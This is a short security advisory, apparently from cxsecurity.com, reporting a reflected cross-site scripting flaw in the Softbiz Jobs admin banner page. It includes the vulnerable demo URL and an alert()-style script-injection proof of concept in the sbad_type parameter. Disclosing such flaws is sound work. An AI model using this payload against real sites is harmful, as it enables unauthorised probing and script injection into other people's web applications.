Softbiz Jobs cross site scripting

2010.02.25
Credit: Pratul Agrawal
Risk: Low
Local: No
Remote: No
CVE: N/A
CWE: N/A

======================================================================= Softbiz Jobs XSS Vulnerability ======================================================================= by Pratul Agrawal # Vulnerability found in- Insert New Banner module # email Pratulag@yahoo.com # company aksitservices # Credit by Pratul Agrawal # Download http://www.softbizscripts.com/ # Script softbizscripts # URL http://demos1.softbiz.com/scripts/seojobs/admin/addad.php?sbad_type=top # Proof of concept ................................................................................................................... http://demos1.softbiz.com/scripts/seojobs/admin/addad.php?sbad_type=[XSS SCRIPT] ................................................................................................................... Example- ................................................................................................................... http://demos1.softbiz.com/scripts/seojobs/admin/addad.php?sbad_type="><script>alert(123)</script> ................................................................................................................... #If you have any questions, comments, or concerns, feel free to contact me.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top